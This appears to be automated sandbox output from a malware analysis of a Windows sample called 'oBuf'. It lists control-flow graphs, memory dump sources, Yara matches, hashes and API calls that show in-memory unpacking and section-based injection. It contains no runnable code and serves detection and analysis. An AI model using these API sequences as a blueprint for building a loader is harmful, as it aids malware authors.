                                                                                                            • Source File: 0000000C.00000002.1425653193.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateProcessTerminateThreadUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 1921587553-0
                                                                                                            • Opcode ID: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                                                                                                            • Instruction ID: 67905ead67b615cb9fd2ac39997d468ff33d28dd355ca5d175fe45067cf906e9
                                                                                                            • Opcode Fuzzy Hash: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
                                                                                                            • Instruction Fuzzy Hash: 8B414732618E0C4FD778EE6CA88966377D5E798351B1643AAD809D3389EE30D85183C5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 464 8e14ff-8e1518 465 8e151a-8e151c 464->465 466 8e151e 465->466 467 8e1523-8e152f CreateToolhelp32Snapshot 465->467 466->467 468 8e153f-8e154c Module32First 467->468 469 8e1531-8e1537 467->469 470 8e154e-8e154f call 8e11be 468->470 471 8e1555-8e155d 468->471 469->468 474 8e1539-8e153d 469->474 475 8e1554 470->475 474->465 474->468 475->471
                                                                                                            APIs
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008E1527
                                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 008E1547
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1426518576.00000000008DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 008DE000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_8de000_oBuf.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                            • String ID:
                                                                                                            • API String ID: 3833638111-0
                                                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                            • Instruction ID: 76ae1e77e353c74b21ff8b5cc353b5cdb83bdec68eceaa28a8f1ddf054e98619
                                                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                            • Instruction Fuzzy Hash: 1EF096322007556BDB203BFAAC8DBAE76ECFF8A724F100529E657D24C0DB70ED458661

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 134 6a003c-6a0047 135 6a0049 134->135 136 6a004c-6a0263 call 6a0a3f call 6a0e0f call 6a0d90 VirtualAlloc 134->136 135->136 151 6a028b-6a0292 136->151 152 6a0265-6a0289 call 6a0a69 136->152 153 6a02a1-6a02b0 151->153 156 6a02ce-6a03c2 VirtualProtect call 6a0cce call 6a0ce7 152->156 153->156 157 6a02b2-6a02cc 153->157 163 6a03d1-6a03e0 156->163 157->153 164 6a0439-6a04b8 VirtualFree 163->164 165 6a03e2-6a0437 call 6a0ce7 163->165 166 6a04be-6a04cd 164->166 167 6a05f4-6a05fe 164->167 165->163 169 6a04d3-6a04dd 166->169 170 6a077f-6a0789 167->170 171 6a0604-6a060d 167->171 169->167 173 6a04e3-6a0505 169->173 174 6a078b-6a07a3 170->174 175 6a07a6-6a07b0 170->175 171->170 176 6a0613-6a0637 171->176 185 6a0517-6a0520 173->185 186 6a0507-6a0515 173->186 174->175 178 6a086e-6a08be LoadLibraryA 175->178 179 6a07b6-6a07cb 175->179 180 6a063e-6a0648 176->180 184 6a08c7-6a08f9 178->184 182 6a07d2-6a07d5 179->182 180->170 183 6a064e-6a065a 180->183 187 6a07d7-6a07e0 182->187 188 6a0824-6a0833 182->188 183->170 189 6a0660-6a066a 183->189 190 6a08fb-6a0901 184->190 191 6a0902-6a091d 184->191 192 6a0526-6a0547 185->192 186->192 193 6a07e2 187->193 194 6a07e4-6a0822 187->194 196 6a0839-6a083c 188->196 195 6a067a-6a0689 189->195 190->191 197 6a054d-6a0550 192->197 193->188 194->182 198 6a068f-6a06b2 195->198 199 6a0750-6a077a 195->199 196->178 200 6a083e-6a0847 196->200 202 6a05e0-6a05ef 197->202 203 6a0556-6a056b 197->203 204 6a06ef-6a06fc 198->204 205 6a06b4-6a06ed 198->205 199->180 206 6a084b-6a086c 200->206 207 6a0849 200->207 202->169 208 6a056f-6a057a 203->208 209 6a056d 203->209 210 6a074b 204->210 211 6a06fe-6a0748 204->211 205->204 206->196 207->178 214 6a059b-6a05bb 208->214 215 6a057c-6a0599 208->215 209->202 210->195 211->210 218 6a05bd-6a05db 214->218 215->218 218->197
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006A024D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1426113071.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_6a0000_oBuf.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID: cess$kernel32.dll
                                                                                                            • API String ID: 4275171209-1230238691
                                                                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                            • Instruction ID: edfa6b35737d46774f892f9e838a511c53124eeea6e349ba935a860513cbf214
                                                                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                            • Instruction Fuzzy Hash: 0A526874A01229DFDB64CF58C985BA8BBB1BF09304F1480D9E94DAB351DB30AE95DF14

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 446 418770-4188b0 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00513D70), ref: 0041884F
                                                                                                            • GetProcAddress.KERNEL32(00000000,0041E298), ref: 0041888C
                                                                                                            • VirtualProtect.KERNELBASE(00513BB4,00513D6C,00000040,?), ref: 004188AB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425704259.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_40b000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 2099061454-3916222277
                                                                                                            • Opcode ID: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
                                                                                                            • Instruction ID: 2b977b853b8716191c274d39b2deee1532fc6552ce3022b0d9a41b083186e0cb
                                                                                                            • Opcode Fuzzy Hash: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
                                                                                                            • Instruction Fuzzy Hash: D8316F18508780CAE301DB79FC257823F6AAB75744F04D0ACD54C8B3B1D7BA5618E36E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 477 6a0e0f-6a0e24 SetErrorMode * 2 478 6a0e2b-6a0e2c 477->478 479 6a0e26 477->479 479->478
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNELBASE(00000400,?,?,006A0223,?,?), ref: 006A0E19
                                                                                                            • SetErrorMode.KERNELBASE(00000000,?,?,006A0223,?,?), ref: 006A0E1E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1426113071.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_6a0000_oBuf.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode
                                                                                                            • String ID:
                                                                                                            • API String ID: 2340568224-0
                                                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                            • Instruction ID: a812bd8a4e5226da291cda7890492f087020d928e330f1a56def5d4e73e5cff5
                                                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                            • Instruction Fuzzy Hash: 90D0123114512877DB003A94DC09BCD7B1CDF09B62F008451FB0DD9180C770994046E5

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 498 40190e-40190f 499 401912-401963 call 4011a4 Sleep call 401426 498->499 500 4018b5-4018ff call 4011a4 498->500 523 401972-401978 499->523 524 401965-40196d call 401529 499->524 527 40198e 523->527 528 40197f-40198a 523->528 524->523 527->528 529 401991-4019bd call 4011a4 527->529 528->529
                                                                                                            APIs
                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425653193.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 4152845823-0
                                                                                                            • Opcode ID: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                                                                                                            • Instruction ID: c3efed824753038ef125f202698f45fd900918c8f6410fb3a7b527937a7c5fc5
                                                                                                            • Opcode Fuzzy Hash: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
                                                                                                            • Instruction Fuzzy Hash: D811BFB220C204EBEB00AA908C52EAA3754AF05710F248137BA42791F1C57D9A13F75B

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 537 8e11be-8e11f8 call 8e14d1 540 8e11fa-8e122d VirtualAlloc call 8e124b 537->540 541 8e1246 537->541 543 8e1232-8e1244 540->543 541->541 543->541
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008E120F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1426518576.00000000008DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 008DE000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_8de000_oBuf.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                            • Instruction ID: bb755456eb7ef897614bc9559feffe8a1c64ff4052bae70c6232197470513e02
                                                                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                            • Instruction Fuzzy Hash: 00112B79A00248EFDB01DF99C989E98BBF5FF08750F058094FA489B362D371EA50DB80
                                                                                                            APIs
                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425653193.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 4152845823-0
                                                                                                            • Opcode ID: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                                                                                                            • Instruction ID: 207861a3759c1b147de2553678edefd9187cc257709d93c52e233f88d5e7a3be
                                                                                                            • Opcode Fuzzy Hash: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                                                                                                            • Instruction Fuzzy Hash: B70169F1208209FBEB009A908D61EBA3668AB05760F700133BA13781F5D57C9A53E76B
                                                                                                            APIs
                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425653193.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 4152845823-0
                                                                                                            • Opcode ID: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                                                                                                            • Instruction ID: 578df434b3d236032839297bc76fd9486bb072801922ad90ba2380d7086ecf03
                                                                                                            • Opcode Fuzzy Hash: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                                                                                                            • Instruction Fuzzy Hash: 95F05EB1208209FBEF009F908D61EAA3729AF05710F644137BA52781F5D63CDA53EB1B
                                                                                                            APIs
                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425653193.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 4152845823-0
                                                                                                            • Opcode ID: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                                                                                                            • Instruction ID: b5d34a972f1ec939c421f577379ccf4d396b21f1793fd223155277739043cea6
                                                                                                            • Opcode Fuzzy Hash: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                                                                                                            • Instruction Fuzzy Hash: 5AF05EB1218209FBEB009F908D61EBA3629AF05310F644177BA12781F5C63DDA23E75B
                                                                                                            APIs
                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425653193.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 4152845823-0
                                                                                                            • Opcode ID: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                                                                                                            • Instruction ID: c277f467d3f9426b8f9a73765fdcab00a649fd51b95b24d53f0d4f33e3e8ae71
                                                                                                            • Opcode Fuzzy Hash: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                                                                                                            • Instruction Fuzzy Hash: F7F037B1108209FBDF009F94CD51EAA3729AF09310F644577BA12781F5C63DDA12E72B
                                                                                                            APIs
                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425653193.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 4152845823-0
                                                                                                            • Opcode ID: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                                                                                                            • Instruction ID: 30c85490bd3e36b3d7497cee73256dee3cb4488b2b17691bada95d8d1bd3f612
                                                                                                            • Opcode Fuzzy Hash: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                                                                                                            • Instruction Fuzzy Hash: 33F037B1204205FBDF009F94CD91EAE3629AF05310F644173BA12791F5D67DDA12E75B
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNELBASE(00000000,00513D6C,00418DAF), ref: 00418748
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425704259.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_40b000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 3494564517-0
                                                                                                            • Opcode ID: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                                                                                                            • Instruction ID: 68696ac1b9cb92420161d977e59fd9b705cf74f057d8962c0b4e3d7dbc73b596
                                                                                                            • Opcode Fuzzy Hash: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                                                                                                            • Instruction Fuzzy Hash: FDB012F0A492009FD700CF54FC64BD03B74F358302F00C061F500C2164EB304908EB10
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1426113071.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_6a0000_oBuf.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: .$GetProcAddress.$l
                                                                                                            • API String ID: 0-2784972518
                                                                                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                            • Instruction ID: 950ca7b9e5abbbfde5366c66b5014f758a29023b43122d8a2dbe4e0272f0e847
                                                                                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                            • Instruction Fuzzy Hash: 5B3137B6900609DFEB10DF99C880AAEBBF6FF49324F24504AD441A7311D771EA45CFA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425653193.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 18f97d7e3c198c930df0e1e3726df986428e5bed6b78be6737e9bf24f670245c
                                                                                                            • Instruction ID: 1fe14f3d08a5ad6b2b8af3127fa4f425e7ffb0c359c280517f11db711c116789
                                                                                                            • Opcode Fuzzy Hash: 18f97d7e3c198c930df0e1e3726df986428e5bed6b78be6737e9bf24f670245c
                                                                                                            • Instruction Fuzzy Hash: 0A716C32400264DADB28EFBCC6CAE557370FB02F00B550BB6C5812F58ADB75B6198B96
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1426518576.00000000008DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 008DE000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_8de000_oBuf.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                            • Instruction ID: 6bb3467bac25ef0b4998f51e68fe399135ddc976cd6cd032a2b3a296fc824639
                                                                                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                            • Instruction Fuzzy Hash: 601170723401019FD754DE5ADC91FA673EAFB8A324B298865ED04CB311D6B5EC41CB60
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425653193.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 14c91299fc0d5ea6405d973304b2732cfb05cef970dc5b42c380558f1c3c8a50
                                                                                                            • Instruction ID: e7a2f1e1f2d18035c496875c0c2bba996cc0d18765e75913e3c7fd8bcbe23822
                                                                                                            • Opcode Fuzzy Hash: 14c91299fc0d5ea6405d973304b2732cfb05cef970dc5b42c380558f1c3c8a50
                                                                                                            • Instruction Fuzzy Hash: CA11533600420ADFD715EE219A89AA9BB21FB45704B5400BADE562B0C2A2BD7123970B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425653193.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5ecd1a4c209d5f5235aa5223a66586c749e58f70271c2d5c11b30b858281451a
                                                                                                            • Instruction ID: d9f06ca26037506423ecc87bc330270b3b45d0e2ffab50e6a8e269eb556b0e13
                                                                                                            • Opcode Fuzzy Hash: 5ecd1a4c209d5f5235aa5223a66586c749e58f70271c2d5c11b30b858281451a
                                                                                                            • Instruction Fuzzy Hash: 7411533640820ADFD715EE21AA89AA6BB31FB45704F5400BBDE562B0C1E2BD7123D74B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425653193.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2c29bc3172a4a75054b17bc2abf467eb46d0d52112e2b03bc1234d3f1f3eeaba
                                                                                                            • Instruction ID: 8ab6e973ac2bde56534b905b9a6112487ad567182bc04a9cefd4a17b3c0f3d42
                                                                                                            • Opcode Fuzzy Hash: 2c29bc3172a4a75054b17bc2abf467eb46d0d52112e2b03bc1234d3f1f3eeaba
                                                                                                            • Instruction Fuzzy Hash: A6113636504206CFDB15DF20D9895A8B722FB45704B1400BACE522B0C1E37D7113D70B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425653193.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c2fb1fcd810030a7c701492efe6b1583806f24c29ad391e8378491e72e53c4f9
                                                                                                            • Instruction ID: 10c1f8c9815bd1bae344db256f26ecf9b321a2c49f9f40fa9571263b21f216dd
                                                                                                            • Opcode Fuzzy Hash: c2fb1fcd810030a7c701492efe6b1583806f24c29ad391e8378491e72e53c4f9
                                                                                                            • Instruction Fuzzy Hash: 17113636404206CFD715DF10AA895A8B721BB55704B14007ACE521B0C1A3BD6113970B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425653193.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ad580f4852e8641318215a16f7c63f70c318642c86c98d9f634171b4294914d4
                                                                                                            • Instruction ID: f3401649f1529dc56ca8e0e6371485d35b9042d0b2056da4c8f47593e1f5965b
                                                                                                            • Opcode Fuzzy Hash: ad580f4852e8641318215a16f7c63f70c318642c86c98d9f634171b4294914d4
                                                                                                            • Instruction Fuzzy Hash: 7701263644420ACFDB1AEF11E9896E8B732FB55704B5401BACE565B0C1E37D6113D70B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425653193.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0d17a2e63e4f1915686b689582fba0273351ae16582c8cdc9572b60fe9b5c197
                                                                                                            • Instruction ID: ab8b863e00b9434e1dbf8970a3beebb42fa128e0550c32edf730788d57ebd560
                                                                                                            • Opcode Fuzzy Hash: 0d17a2e63e4f1915686b689582fba0273351ae16582c8cdc9572b60fe9b5c197
                                                                                                            • Instruction Fuzzy Hash: 1001263640434ACFCB16EF11E9895E4BB32BF45708B4801A6CE565B092E3793122D70B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1426113071.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_6a0000_oBuf.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                            • Instruction ID: 9670c6dc6782615957e8167651f040a8d9d68a0a5bd5790f4f5c73451d1e142f
                                                                                                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                            • Instruction Fuzzy Hash: 7E0184766016048FEB21EF64C804BEA33E6FF87315F4544A5D50697242E774AD418F90
                                                                                                            APIs
                                                                                                            • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00418A04
                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418A1F
                                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 00418A42
                                                                                                            • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418A51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.1425704259.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_40b000_oBuf.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                            • String ID:
                                                                                                            • API String ID: 2776817195-0
                                                                                                            • Opcode ID: 87efacac19a89b0c53b9dbb33d5e1312a162f1387c04757d6307752c4e174176
                                                                                                            • Instruction ID: bd9cb2cda3ccdbb603686fa1a54157cb247b1e4b5f6e470ed3bcac1d3601a900
                                                                                                            • Opcode Fuzzy Hash: 87efacac19a89b0c53b9dbb33d5e1312a162f1387c04757d6307752c4e174176
